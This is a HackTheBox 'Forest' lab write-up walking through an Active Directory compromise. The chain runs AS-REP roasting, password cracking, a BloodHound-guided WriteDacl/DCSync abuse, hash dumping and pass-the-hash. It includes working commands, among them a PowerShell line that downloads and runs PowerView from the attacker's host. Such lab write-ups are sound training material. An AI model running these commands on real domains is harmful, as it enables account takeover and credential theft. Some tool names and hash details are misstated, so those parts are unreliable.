HackTheBox - Forest Writeup

tags: writeup HackTheBox Machine Easy OSCP bloodhound impacket DCsync ASPReroast kerbrute AD

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.12s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-14T16:05:13
|_  start_date: 2022-08-14T16:03:38
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-08-14T09:05:14-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 14 11:58:34 2022 -- 1 IP address (1 host up) scanned in 27.49 seconds

Services:

• Port 53 : Simple DNS Plus
• Port 88 : Microsoft Windows Kerberos
• Port 135 : Microsoft Windows RPC
• Port 139 : Windows Netbios-ssn
• Port 389 : Windows Active Directory LDAP
• Port 445 : microsoft-ds Windows Server 2016 Standard 14393
• 464 : kpasswd5?
• Port 594 : ncacn_http Microsoft Windows RPC over HTTP
• Port 636: tcpwrapped
• Port 3268 : Windows Active Directory LDAP
• Port 3269 : tcpwrapped

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

Knowing that we can enumerate kerberos we are going to use kerbrute to bruteforce usernames.

/opt/kerbrute/kerbrute_linux_amd64 userenum --dc HTB.local -d HTB.local /usr/share/seclists/Usernames/Names/names.txt 

After enumerate with this list I discover this usernames:

• andy
• forest
• lucinda
• mark
• sebastien

But looking into this usernames i don't found nothing interesting so we can enumerate with enum4linux.

sudo enum4linux -a 10.10.10.161

Reading the resutls of this tool I noticed that there are more users.

Looking the new stuff discovered we have this list.

Usernames:

• andy@HTB.local
• forest@HTB.local
• lucinda@HTB.local
• mark@HTB.local
• sebastien@HTB.local
• santi@HTB.local
• administrator@HTB.local
• svc-alfresco@HTB.local

Looking the usernames at the first look we see that svc-alfresco its a service account so maybe is ASPR-Roastable and we can obtain the kerberos ticket to crack it.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

To do de ASPR-Roastable we are gonna use impacket:

impacket-GetNPUsers HTB.local/svc-alfresco -no-pass

We receive the Kerberos TGT and now we can try to crack it with john:

We have to put the Kerberos hash into a file and use the following command to crack it.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

We receive the following result:

s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

After knowing the user and the password we can use evil-winrm to obtain a shell as svc-alfresco, use the following command:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

After that now we have a shell as svc-alfresco, for more info about evil-winrm go to his github.

Now it's time to enumerate and find the way to obtain Administrator priveleges.

⏫Root Privesc

Knowing this is an AD we are gonna start enumerating with Bloodhound, so knowing the credentials for svc-alfresco we can use bloodhound-python ingestor, that can be used remotely and it isn't necessary to upload any file to the machine, we can use the following command:

bloohound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d HTB.local -c All

This we generate in our machine a few json that we have to upload to Bloodhound as we see in my previous bloodhound post.

After upload it and bloodhound and Start the query select the shortest path to domain admins we see this.

We have to right click on HTB.local and click Set as Ending Node:

After that we obtain this graph that show to us the path to make the privilege escalation.

Taking a look into the graph we see that we have to make part of 'EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL' to be capable of use WriteDacl to obtain Admin privileges, so adding EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group to svc-alfresco user we can leverage this account and try to dump the NTLM hashes.

Right clicking on WriteDacl inside bloodhound and clicking on help next to on abuse info, it will explain how to abuse from DCsync in my case i recommend to look in a web like this.

Reading the Abuse info and the the guide on the web we see, that we have to make this steps:

1. Import PowerView
2. Add-DomainGroupMember (add svc-alfresco to EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)
3. Create the pass object.
4. Create the Credential Object.
5. And the last, Add-DomainObjectAcl

After that we should can dump the credential hashes from the dc. These are the Commands that you have to enter.

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/PowerView.ps1')

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; 

$pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $pass)

Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity "HTB.LOCAL\Domain Admins" -Rights DCSync

Fail attempt

In the case that when you add the user to the Exchange Windows Permissions don't work you have to make a script that executes all in once. In my case i found it after doing the machine in the 0xdf writeup.

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

After execute the commands or the Script we can use impacket-secretdump to dump the LDAP hashes using the following command:

impacket-secretdump HTB.local/svc-alfresco:s3rvice@10.10.10.161

We receive this something like this:

If you look the entire hash you can see that is a NTLMv1 hash so we can pass-the-hash to Administrator account .

Using evil-winrm we can pass the hash it and obtain Administrator shell:

evil-winrm -i 10.10.10.161 -u Administrator -H NT_Hash

And that's all folks we obtained Administrator Privileges! Check my media!

You can find me on: